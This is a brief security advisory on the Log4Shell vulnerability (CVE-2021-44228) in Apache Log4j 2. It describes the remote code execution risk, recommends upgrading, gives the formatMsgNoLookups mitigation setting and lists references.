CVE-2021-44228
Discovered: December 10th, 2021
Impacted Tech:
Apache Log4j 2 versions 2.0 to 2.14.1
Apache Struts
Attacker Location:
External
Highlights:
Log4j 2 is an open source Java logging library developed and maintained by Apache.
A zero-day vulnerability recently discovered gives an attacker the ability to achieve remote code execution by supplying malicious data within a log file to an application utilizing the Log4j library.
This vulnerability can be reliably exploited and does not require authentication.
This vulnerability has been determined to be critical, and it is recommended that anyone running an application that utilizes the Log4j library to update to the latest version immediately.
If updating to version 2.15.0 is not possible, this vulnerability can be mitigated by setting the following parameter to “true” when starting a Java virtual machine:
log4j2.formatMsgNoLookups = true
(-Dlog4j2.formatMsgNoLookups=true in JVM command line)References:
NVD – CVE-2021-44228 (nist.gov)
Log4j – Apache Log4j Security Vulnerabilities
CVE-2021-44228 – Log4j 2 Vulnerability Analysis – Randori Attack Team
Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec
Vulnerability Alert 